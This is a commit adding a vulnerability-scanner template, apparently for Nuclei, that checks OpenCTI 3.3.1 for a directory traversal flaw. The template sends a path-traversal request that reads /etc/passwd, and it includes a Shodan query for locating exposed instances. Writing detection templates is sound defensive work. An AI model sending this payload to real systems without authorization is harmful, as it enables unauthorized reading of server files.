Merge pull request #4878 from Akokonunes/patch-169

Create opencti-lfi.yaml
patch-1
Prince Chaddha 2022-07-21 13:27:26 +05:30 committed by GitHub
commit 6c778e84d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: opencti-lfi
info:
name: OpenCTI 3.3.1 - Directory Traversal
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2020060078
- https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
metadata:
verified: true
shodan-query: http.html:"OpenCTI"
tags: opencti,lfi,oss
requests:
- method: GET
path:
- "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200